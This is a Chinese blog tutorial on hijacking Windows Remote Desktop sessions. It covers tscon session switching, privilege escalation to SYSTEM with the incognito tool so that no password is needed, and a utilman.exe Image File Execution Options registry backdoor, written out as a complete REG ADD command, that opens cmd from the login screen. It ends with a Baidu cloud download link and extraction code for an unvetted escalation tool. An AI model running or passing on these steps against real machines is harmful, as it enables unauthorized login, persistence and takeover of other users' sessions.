楚天’s Blog

部分图片看不清可右键新建标签页查看

一、先介绍两条命令吧

1.query user命令

查询用户命令:query user在输入这一条命令后,会显示计算机机名或域,后面跟用户名。

图片看不清可右键新建查看

2.第二条 tscon切换会话命令

Windows系统下,tscon可被用来切换远程桌面的会话。正常情况下,切换会话时需要提供登录密码,但通过特殊的利用方法能够绕过验证,不输入密码实现未授权登录。该命令具体用法如下

二、使用场景一

先创建一个用户,然后远程桌面登录到新创建的用户。

使用query user查询已登录的用户。

接着使用tscon ID号 /PASSWORD:该ID所对应的密码进行切换

1
tscon 2 /PASSWORD:*******

回车之后,就切换到了administrator的远程桌面

三、使用场景二

由于Windows的一些特性,若是在System权限执行同样的命令的时候,将会绕过输入密码的过程。

图片看不清可右键新建查看

可见上图执行失败了,虽然是以管理员权限运行的CMD,但是还是以chutian这个用户名去打开的,并不是System权限。需要进行更进一步的提权。

提权

这里使用的是incognito提权(还有很多其他方法,自行百度,不一一举例了)

使用System权限进行切换

1
tscon ‘ID号’

可见,无需输入密码,直接切换了

四、使用场景三

比如在渗透过程中,可以利用辅助工具管理器后门(如放大镜后门)绕过系统登陆界面

通过注册表劫持实现后门,修改注册表的命令如下:

1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

使用快捷键win+u调出CMD窗口

两个会话都可以切换

成功进入

五、备注:

所使用的提权软件:

链接:https://pan.baidu.com/s/1WsCczfnmKue0t5P0_STmNw
提取码:kzxb
复制这段内容后打开百度网盘手机App,操作更方便哦

软件来源于互联网,后门自测


 评论